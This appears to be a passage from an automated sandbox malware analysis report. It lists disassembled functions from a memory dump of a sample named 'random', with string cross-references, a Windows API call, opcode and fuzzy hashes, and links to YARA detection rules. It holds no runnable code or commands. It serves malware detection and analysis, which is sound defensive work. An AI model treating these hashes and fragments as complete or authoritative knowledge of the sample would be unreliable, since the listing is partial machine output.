String ID: ut$.^Nw$QRP,
API String ID: 0-2489489831
Opcode ID: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
Instruction ID: c8479f28a28c815cfbd9d5fc95f9476b123213feaa6e9ea5c0c948cebaf48d73
Opcode Fuzzy Hash: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
Instruction Fuzzy Hash: 3B710A7110D3918FD3258B2588B03E7BBD19FDB704F585A5DD0CA4B341DB794906CB56

Function 0040F2D0 Relevance: 3.9, Strings: 3, Instructions: 168COMMON

Download Yara Rule

Strings

:, xrefs: 0040F2F5
, xrefs: 0040F44B
K, xrefs: 0040F38E

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: $:$K
API String ID: 0-296352136
Opcode ID: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
Instruction ID: e3fd2fc2a8267f717fe0e7e766dd9ea259cde5192962e3fe240e8cbdfa04c585
Opcode Fuzzy Hash: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
Instruction Fuzzy Hash: 3A51A27250C7908AD7209B3884543AFBBD0AB96334F190F7EE8EAE73C1E67885458757

Function 00404E20 Relevance: 3.3, Strings: 2, Instructions: 792COMMON

Download Yara Rule

Strings

0, xrefs: 0040573B
8, xrefs: 00405733

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
Instruction ID: 19de03d7aa05240092aa3acb4ee1ab33a8cd98421fbae1c194af479a45b94dce
Opcode Fuzzy Hash: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
Instruction Fuzzy Hash: 3B720171508740AFD710CF18C884BABBBE1EB88314F44892EF9999B391D379D958CF96

Function 0041F9A0 Relevance: 3.3, Strings: 2, Instructions: 771COMMON

Download Yara Rule

Strings

/B, xrefs: 00420402
nB, xrefs: 004203B8

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: /B$nB
API String ID: 0-3787476056
Opcode ID: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
Instruction ID: 01d0190d3bb0ccc58f1444bdf38ba46b89cc646c5dd88bcfe1081667cb01010c
Opcode Fuzzy Hash: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
Instruction Fuzzy Hash: 3E7270B0509B808FD3658F3C8855797BFD5AB5A324F148A5EE0FE873D2C77960018B6A

Function 0042BA20 Relevance: 3.1, APIs: 2, Instructions: 146COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042BB95
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042BC1E

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
Instruction ID: 88c8716360a9849faea0ff28cefb8e51f229f873179c28473aebd70c66339d06
Opcode Fuzzy Hash: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
Instruction Fuzzy Hash: 28513672519350CFE324CF76DC8075BBBA2FBC2304F16862DE5951B290CBB984068B86

Function 00422880 Relevance: 3.0, Strings: 2, Instructions: 455COMMON

Download Yara Rule

Strings

27, xrefs: 00422934
!', xrefs: 0042289A

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: !'$27
API String ID: 0-1982139352
Opcode ID: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
Instruction ID: 5153aecd17f80642fd8c0eece016e91168ea77982d201b76830abc39117f0e9e
Opcode Fuzzy Hash: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
Instruction Fuzzy Hash: F5C156B57083109BD7149F29DD9276BB7E1EF81314F88852EE8C58B391E6BCD904C35A

Function 00443B60 Relevance: 2.9, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

>D, xrefs: 00443ED1
UUK, xrefs: 00443D79

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: >D$UUK
API String ID: 0-1347512165
Opcode ID: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
Instruction ID: 5ece47969d2e4495fd744cec34393a228d2be6badad345384a3b8f4f4ab2efe2
Opcode Fuzzy Hash: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
Instruction Fuzzy Hash: 86D1EE35A08310CFD314DF29D89072BB7E2BBDA300F4A897DE98997392D675D941CB86

Function 00429F7C Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

rYaT, xrefs: 00429FE8
ji46, xrefs: 00429FA4

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: ji46$rYaT
API String ID: 0-3893754386
Opcode ID: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
Instruction ID: dcd566aaca25f8eff7100027eceeae2756314058decd7535bc98b9674378a6ea
Opcode Fuzzy Hash: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
Instruction Fuzzy Hash: 1BE1F132A08351CFD314CF29D88035AB7E2FFCA324F698A6DE995572A1D734DC158B86

Function 004195B6 Relevance: 2.9, Strings: 2, Instructions: 363COMMON

Download Yara Rule

Strings

=, xrefs: 004197CC
^\, xrefs: 004198D8

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: =$^\
API String ID: 0-3808277151
Opcode ID: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
Instruction ID: 449fbb577030d5845b3ff3c78ea8df1dbbecff39a5bc4c3e86ed8d0a83d476b4
Opcode Fuzzy Hash: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
Instruction Fuzzy Hash: 20B1E6B56483428BD328DF25C8A07ABBBE1EFD5315F08892DE4D58B381E77C8845C796

Function 0042F1C1 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

6, xrefs: 00430397
H, xrefs: 0043046D

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 6$H
API String ID: 0-1447585844
Opcode ID: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
Instruction ID: 70973cbbd1d345abe4e026803d5a60bd6a74268ec64029004c3dfe15c300f41f
Opcode Fuzzy Hash: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
Instruction Fuzzy Hash: 80814B716083914FD318CB29C8A136BBBE09FA6304F18996EE5D58B392D67DC806CB56

Function 0043025E Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

6, xrefs: 00430397
H, xrefs: 0043046D

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 6$H
API String ID: 0-1447585844
Opcode ID: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
Instruction ID: 66dbb9f7593940bda3bdb21456c4f2af28ce9aa7ca169eb6b940cdf049e341e0
Opcode Fuzzy Hash: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
Instruction Fuzzy Hash: 4B814C716083914FD718CB39C8A136BBBE09FA6304F18D96EE5D587382D67DC806CB56

Function 004302CD Relevance: 2.8, Strings: 2, Instructions: 281COMMON

Download Yara Rule

Strings

6, xrefs: 00430397
H, xrefs: 0043046D

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 6$H
API String ID: 0-1447585844
Opcode ID: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
Instruction ID: c9c02734f3e5a7eb2ca0eed0804f28c87630d1e97fd284b28010db33944d152d
Opcode Fuzzy Hash: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
Instruction Fuzzy Hash: 99816E716083814FD318CB39C8A136BBBE09F96304F18D96EE5D587382D67DC806CB56

Function 004123EC Relevance: 2.8, Strings: 2, Instructions: 271COMMON

Download Yara Rule

Strings

n, xrefs: 004123FF
n, xrefs: 004125AE

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: n$n
API String ID: 0-3874132673
Opcode ID: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
Instruction ID: 424b4f810cf5c42aa0f11275d2ef5d9a27bebee222b9303fc165311a88e3af60
Opcode Fuzzy Hash: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
Instruction Fuzzy Hash: A1A1F676A087508BC3249B3885813AFBBD1AFC5324F198E3EE5E9D33D1DA7888418747

Function 00415DD8 Relevance: 2.7, Strings: 2, Instructions: 215COMMON

Download Yara Rule

Strings

gfff, xrefs: 00415F4F
7, xrefs: 00415F1F

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: 182f3249541d53321ff3a465a177239aaee99738a326feff563185d87f9bb099
Instruction ID: 4941e5eadb7aba571cda7473ebd939308df881bd2ae5f083bfc9904c5215119c
Opcode Fuzzy Hash: 182f3249541d53321ff3a465a177239aaee99738a326feff563185d87f9bb099
Instruction Fuzzy Hash: 7061F572A446118FE714CF29DC017ABB7E2EBC5314F09C62EE485DB392EB3898458B85

Function 0043E6E0 Relevance: 2.0, Strings: 1, Instructions: 749COMMON

Download Yara Rule

Strings

XY, xrefs: 0043EBE7

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: XY
API String ID: 0-554446067
Opcode ID: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
Instruction ID: d641272ad35b4eeebbd9d600f92596cd8dd7c25af792fba6638ab3cd001d37ae
Opcode Fuzzy Hash: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
Instruction Fuzzy Hash: 3D322F3AA18351CBC7149F28D91236BB7E1EF8A300F09D97ED4C997291E7B8C945C786

Function 0042AF92 Relevance: 2.0, Strings: 1, Instructions: 719COMMON

Download Yara Rule

Strings

q, xrefs: 0042ADA6

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: q
API String ID: 0-3900047139
Opcode ID: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
Instruction ID: d2894ee3cd08ac16c3749e12b5b110520c9353356bc4cfd2bf9c021bc54d189f
Opcode Fuzzy Hash: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
Instruction Fuzzy Hash: B522F1B4608311CBD714CF64D8A176BB7F1FF96318F48896DE8854B391E7788906CB8A

Function 004324EE Relevance: 1.8, Strings: 1, Instructions: 514COMMON

Download Yara Rule

Strings

6, xrefs: 00432790

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: ac07f149d65fe26ea065e0c1761624a1b626f6eed3cc7614f6515bb7ce6c8acc
Instruction ID: 787a559d3a6ca89598d2bb367016cd154da02af78fea546a06432564028693a7
Opcode Fuzzy Hash: ac07f149d65fe26ea065e0c1761624a1b626f6eed3cc7614f6515bb7ce6c8acc
Instruction Fuzzy Hash: C3322CB0405B819FD351DF39C545793BFE0AB16214F188A9EE4E9CB383D236E146CBA6

Function 00426010 Relevance: 1.7, APIs: 1, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76074d0fa5649b7af8b65c8d834cc8e8b3a426d5c338a204269d4efa35c5c45e
Instruction ID: 5d6f820f76e102683b6000eea9d9c0854d2a53b51ca8dd83b48920ec6b395174
Opcode Fuzzy Hash: 76074d0fa5649b7af8b65c8d834cc8e8b3a426d5c338a204269d4efa35c5c45e
Instruction Fuzzy Hash: 096111716083548FE720CF65D841BEFB7F0FB8A308F10856CE558AB282DB7554068B8A

Function 0043DF60 Relevance: 1.6, Strings: 1, Instructions: 391COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043E1A0

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 97dad55d8dd3fc337ded57b92089687e6f60b6a3e62a8a8ad6655724058fe796
Instruction ID: 1f4fb5fde5d3a5e7269753d163d491fe37fce05cbc84d157e3c3b696b68cf536
Opcode Fuzzy Hash: 97dad55d8dd3fc337ded57b92089687e6f60b6a3e62a8a8ad6655724058fe796
Instruction Fuzzy Hash: 4CA148316052009BD714CF16CC81B6BB3A6FBC9314F14962DE9A5573C1D779AC06CB9A

Function 00414C30 Relevance: 1.6, Strings: 1, Instructions: 384COMMON

Download Yara Rule

Strings

"PA, xrefs: 00415014

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: "PA
API String ID: 0-2145937358
Opcode ID: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
Instruction ID: f624a7b71cbf7b314e20e1a45d24be04a38f24c047e10d0676dafeec8f7fc991
Opcode Fuzzy Hash: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
Instruction Fuzzy Hash: 5CA102B15183118BD7189F28D8627ABB3E1EFD2314F09892EE8C58B390F77C9945C796

Function 004085B0 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

., xrefs: 0040860E

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
Instruction ID: 911296d1392f8c3c8cd6404ab6709485da162d277dd93cabcee5ac66b0687773
Opcode Fuzzy Hash: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
Instruction Fuzzy Hash: 39A14B72E087618BC7109E28C98035BBBE1AB81310F698A7EDDD4B73D5DB389C458BC5

Function 0043B410 Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

<, xrefs: 0043B58B

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 4cb474083ab1d720fa74cee5836e6e80a3847d91a69879083b1040dd856b60c3
Instruction ID: 298ed6161c937c0e6968453eb829229e96a7e3621a1d6b118fdfa9d8e411f9a2
Opcode Fuzzy Hash: 4cb474083ab1d720fa74cee5836e6e80a3847d91a69879083b1040dd856b60c3
Instruction Fuzzy Hash: 78D1B0216087C28ED726CB3C8844359BF91AB67224F0983D9D0E95F3D3C3698986C7E6

Function 0041BA52 Relevance: 1.5, Strings: 1, Instructions: 293COMMON

Download Yara Rule

Strings

x(m., xrefs: 0041BC5F

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: x(m.
API String ID: 0-3038009362
Opcode ID: 2334306b3d1fa9529e9ef949cf5e5337414280495606308dda49b0f52e9ab68a
Instruction ID: 8fe95d6803831fae5c575aca5061d2950839e556567635e7946eadf65fb6b687
Opcode Fuzzy Hash: 2334306b3d1fa9529e9ef949cf5e5337414280495606308dda49b0f52e9ab68a
Instruction Fuzzy Hash: F27128B2A083108BD3248F25C4D03A7B7E1EFDA314F19595DE8C66B391E7788945C7D6

Function 00406120 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 00406256

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 0e374678804395dc01eb8fefaf4987f3ffbc266451ec095f969c6d68de8c5adc
Instruction ID: 9057347cd236a3d55169ab5d420f90e4f8a8bfd1e184600247eeff6d96e402e7
Opcode Fuzzy Hash: 0e374678804395dc01eb8fefaf4987f3ffbc266451ec095f969c6d68de8c5adc
Instruction Fuzzy Hash: 04B139712083819FD325CF18C88061BFBE0AFA9704F484E6DE5D997782D635E918CBA7

Function 00444950 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

qVol, xrefs: 00444953

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: qVol
API String ID: 0-1016533244
Opcode ID: a4f124c9ac02752dc567efe38763db5f0b81abf009628bda67d4b8c7e599d092
Instruction ID: 3822851cd43ddfd6e2ae3d15aa8c6b5369446e8c252419fc1ba6ad4511229b5c
Opcode Fuzzy Hash: a4f124c9ac02752dc567efe38763db5f0b81abf009628bda67d4b8c7e599d092
Instruction Fuzzy Hash: B181FE752087458BD724CF28D880B6BB3F1FB85354F19812DEA958B3A1EB35EC11C74A

Function 004180F0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

gfff, xrefs: 00418257

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 3bf142fd8a215ea0c64be45187437800715a7ca7fa3f03cb850da3ccfabd6cc7
Instruction ID: 92e196d3d9e6bda93a0c7e2106ea41e010bf6410d3e766de811087e40ead5107
Opcode Fuzzy Hash: 3bf142fd8a215ea0c64be45187437800715a7ca7fa3f03cb850da3ccfabd6cc7
Instruction Fuzzy Hash: 6291C5B1A086429FC714CB29C4917ABFBD29BD5304F18892EE4D9C7352E739DC85CB86

Function 0042AFB0 Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

q, xrefs: 0042ADA6

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: q
API String ID: 0-3900047139
Opcode ID: 6b5437a597b224c58c18eff0cd7f9e1b12adb8a3c204c60dfaa919d9716313ac
Instruction ID: bfd71d5ee42355939c062a028dadac58486c6c85aba871825f936092bfaa215d
Opcode Fuzzy Hash: 6b5437a597b224c58c18eff0cd7f9e1b12adb8a3c204c60dfaa919d9716313ac
Instruction Fuzzy Hash: AC5103B4604310CBD7209F24E85176B73E1FF85318F54456DE9898B3A1E739D92ACB8B

Function 0041D8B0 Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

>, xrefs: 0041DA33

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: >
API String ID: 0-325317158
Opcode ID: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
Instruction ID: f78e35e26b24cf68e4bc09e6cd2b7899b815de8684f97abc49024c1dd2b64b0c
Opcode Fuzzy Hash: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
Instruction Fuzzy Hash: D76127B3A5D6D04BD3258A3C4C613EA6A930FA7330F2D87AAE8F5873E1D15D8C469345

Function 00418492 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

(, xrefs: 00418669

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: ee7fa4accd31e59d0910d8aa9e7224e6b0750909148df57fa657f99ce6b3dc18
Instruction ID: 2caae83b2d4013721f210141ccc417c30349dd5d0901d4fb7f3c841e3804c493
Opcode Fuzzy Hash: ee7fa4accd31e59d0910d8aa9e7224e6b0750909148df57fa657f99ce6b3dc18
Instruction Fuzzy Hash: E851DE74109780DFDB209F24D859BABB7E5FF92314F09096DE4C98B2A1EB388514CB5B

Function 00417054 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

rA, xrefs: 00417161

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: rA
API String ID: 0-3688822144
Opcode ID: 0fecef19979ae2520a6d41ae5022304e5fe91d9e10e30bf12275cb775264daa6
Instruction ID: eea7f0b4564a115e112266a705f564882217ee49f10fc6db0b082ff3a9467cbb
Opcode Fuzzy Hash: 0fecef19979ae2520a6d41ae5022304e5fe91d9e10e30bf12275cb775264daa6
Instruction Fuzzy Hash: 21410B3565C7824BD336CE7984903ABBBD2ABC6310F0C8A7D94D197785DE7CC8468752

Function 0040D172 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

301V, xrefs: 0040D2D5

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 301V
API String ID: 0-2749669040
Opcode ID: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
Instruction ID: baf02472d42b1fd34baef0eca44314001f1f1136a433d7a2becac9f4216ef3dd
Opcode Fuzzy Hash: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
Instruction Fuzzy Hash: 6741BE742483118BD714DF54C8A4B6BB7F1FFC5308F08892DE4865B395E7B99608DB8A

Function 00442DCA Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

UUK, xrefs: 00442E65

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: UUK
API String ID: 0-1743445028
Opcode ID: 64f8c97061e85143dd2bf9607cc879b83cd40bcdd4eb5dc80a7e8408e6d4f248
Instruction ID: e9b7a210428eddec2d32ba3198370ee38b37a834245a60ff4a0e95a4beb386be
Opcode Fuzzy Hash: 64f8c97061e85143dd2bf9607cc879b83cd40bcdd4eb5dc80a7e8408e6d4f248
Instruction Fuzzy Hash: D14106322087504BD31CCF38D9A132BFBD7AB85314F5A856ED0868B791D6B999058B89

Function 004421E9 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

"c_, xrefs: 004422FA

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: "c_
API String ID: 0-1905016733
Opcode ID: 54f33eb4d3c200ec803ec730c350af6742ffe7018a8b1e5f7191d90e9f16e4db
Instruction ID: 139d9a56c6b22736b00f81c9c0a59650492495ee9bcb90bc8dd56261b9d87cf4
Opcode Fuzzy Hash: 54f33eb4d3c200ec803ec730c350af6742ffe7018a8b1e5f7191d90e9f16e4db
Instruction Fuzzy Hash: 7331F172E055018FC319CF2CC8623A6FBA2FB59308F19D12CC555A7796C7B9A80A8B84

Function 0041B58F Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

%, xrefs: 0041B59D

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 2611800c88671bb526049112999962ec915228d777db172c398fa2dfb9493879
Instruction ID: fc55fbf2e67d6e55d69b8bdcc21a86b947583cb7b9fc2e15381c79fb32be4bbc
Opcode Fuzzy Hash: 2611800c88671bb526049112999962ec915228d777db172c398fa2dfb9493879
Instruction Fuzzy Hash: 492125315583508FD3248F24C854B6ABBE0EF9A318F084A5EE4D5EB392C379C945CB8B

Function 00427FFD Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

UZW, xrefs: 004286AD

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: UZW
API String ID: 0-4101217444
Opcode ID: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
Instruction ID: beb92d7dceb5f7ee2bc2359878695b6a9a5b74cab8484de6a3c22e177f9b20e4
Opcode Fuzzy Hash: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
